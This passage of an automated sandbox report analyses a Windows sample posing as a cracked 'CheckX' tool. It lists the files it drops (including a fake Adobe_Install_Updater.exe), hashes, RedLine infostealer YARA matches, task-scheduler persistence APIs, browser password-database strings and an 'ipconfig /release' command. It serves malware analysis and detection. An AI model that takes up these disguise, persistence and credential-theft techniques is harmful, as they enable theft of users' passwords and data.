Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_068BAF41 16_2_068BAF41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_068B0033 16_2_068B0033
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_068BB1CE 16_2_068BB1CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_068B51E3 16_2_068B51E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_068B51F0 16_2_068B51F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_068B4138 16_2_068B4138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_068B4137 16_2_068B4137
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A585D0 16_2_06A585D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A5C2F0 16_2_06A5C2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A5C617 16_2_06A5C617
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A5D4E8 16_2_06A5D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A585C2 16_2_06A585C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A590C8 16_2_06A590C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A590D8 16_2_06A590D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A50007 16_2_06A50007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A50040 16_2_06A50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A9EE80 16_2_06A9EE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A90040 16_2_06A90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A948FB 16_2_06A948FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06A90006 16_2_06A90006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06D1DAF0 16_2_06D1DAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06D00040 16_2_06D00040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06D00007 16_2_06D00007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06D1CDA0 16_2_06D1CDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06DC4228 16_2_06DC4228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06DC8FF8 16_2_06DC8FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06DC8A50 16_2_06DC8A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06DC8A41 16_2_06DC8A41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06DC4218 16_2_06DC4218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06DC8FE8 16_2_06DC8FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 16_2_06DC447C 16_2_06DC447C
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_00D1AF38 20_2_00D1AF38
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_00D17058 20_2_00D17058
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_00D17049 20_2_00D17049
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_00D1F300 20_2_00D1F300
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_00D17698 20_2_00D17698
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_00D176A8 20_2_00D176A8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_055DB208 20_2_055DB208
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_055D4D7F 20_2_055D4D7F
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_055D3918 20_2_055D3918
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_055D3928 20_2_055D3928
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_055DB1F8 20_2_055DB1F8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_055D3A1C 20_2_055D3A1C
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_055DFAB8 20_2_055DFAB8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_055DFAA8 20_2_055DFAA8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06153280 20_2_06153280
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06154488 20_2_06154488
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_061535A7 20_2_061535A7
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06150006 20_2_06150006
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06167322 20_2_06167322
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06166FB8 20_2_06166FB8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06167CA0 20_2_06167CA0
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_0616F4C8 20_2_0616F4C8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06161238 20_2_06161238
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06168271 20_2_06168271
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06161290 20_2_06161290
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_061667B0 20_2_061667B0
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_061667A0 20_2_061667A0
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06166FAA 20_2_06166FAA
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06160006 20_2_06160006
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06160040 20_2_06160040
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_061670DE 20_2_061670DE
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064DCC68 20_2_064DCC68
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064D9008 20_2_064D9008
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064D2FF8 20_2_064D2FF8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064D8FF8 20_2_064D8FF8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064DCC67 20_2_064DCC67
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064DD907 20_2_064DD907
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064DD918 20_2_064DD918
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064DA588 20_2_064DA588
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_064DA598 20_2_064DA598
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06520040 20_2_06520040
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06520027 20_2_06520027
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_065956FC 20_2_065956FC
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06590040 20_2_06590040
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06590027 20_2_06590027
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_0681CFE8 20_2_0681CFE8
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_0680132D 20_2_0680132D
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06800007 20_2_06800007
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 20_2_06800040 20_2_06800040
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe 49B47081F5F4A706CD3B70421094B9DDF59A6C18FCBD177D5F6565FC14514EA1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\build.exe 9B7FC6C8743440FB3958135998D2E4A67143DBDB980D18790CE68FF2634E495D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe 8FC221B7C8E3F52F22841C866CF0D842F2A1266E79B472273766CE1704474499
Sample file is different than original file name gathered from version info
Source: 6RE1Z857ae.exe Binary or memory string: OriginalFilename vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2196588124.000000000120E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004011000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2215324588.0000000006BA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003198000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCheckX.exe. vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000000.2059077137.0000000000C52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCheckX-Cracked-VIP.exeF vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCheckX-Cracked-VIP.exeF vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003010000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2215032852.0000000006B10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2213689503.0000000006870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWumgrxhuw.dll" vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004296000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWumgrxhuw.dll" vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004296000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004163000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.00000000040B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6RE1Z857ae.exe
Source: 6RE1Z857ae.exe Binary or memory string: OriginalFilenameCheckX-Cracked-VIP.exeF vs 6RE1Z857ae.exe
Uses 32bit PE files
Source: 6RE1Z857ae.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 5.0.build.exe.b30000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 5.0.build.exe.b30000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.6RE1Z857ae.exe.3fe9550.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.6RE1Z857ae.exe.3fe9550.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.6RE1Z857ae.exe.3fe9550.10.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.6RE1Z857ae.exe.3fe9550.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000000.2141464839.0000000000B32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 6RE1Z857ae.exe PID: 6984, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: build.exe PID: 1020, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@108/95@1/1
Source: C:\Users\user\Desktop\6RE1Z857ae.exe File created: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\344e479240
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
Source: C:\Users\user\Desktop\6RE1Z857ae.exe File created: C:\Users\user\AppData\Local\Temp\build.exe Jump to behavior
Source: 6RE1Z857ae.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 6RE1Z857ae.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\6RE1Z857ae.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: tmp932A.tmp.32.dr, tmp55.tmp.5.dr, tmp34A5.tmp.5.dr, tmpC202.tmp.32.dr, tmpC635.tmp.32.dr, tmpCFFC.tmp.5.dr, tmpCFFD.tmp.5.dr, tmp935B.tmp.32.dr, tmpD00E.tmp.5.dr, tmpC1B0.tmp.32.dr, tmpC1F1.tmp.32.dr, tmp934B.tmp.32.dr, tmpD01F.tmp.5.dr, tmpD00D.tmp.5.dr, tmpC1D1.tmp.32.dr, tmpC645.tmp.32.dr, tmp34C7.tmp.5.dr, tmpC615.tmp.32.dr, tmp45.tmp.5.dr, tmpC1C1.tmp.32.dr, tmp34B5.tmp.5.dr, tmp8C18.tmp.32.dr, tmp34C6.tmp.5.dr, tmpCFEB.tmp.5.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 6RE1Z857ae.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\6RE1Z857ae.exe File read: C:\Users\user\Desktop\6RE1Z857ae.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\6RE1Z857ae.exe "C:\Users\user\Desktop\6RE1Z857ae.exe"
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\build.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
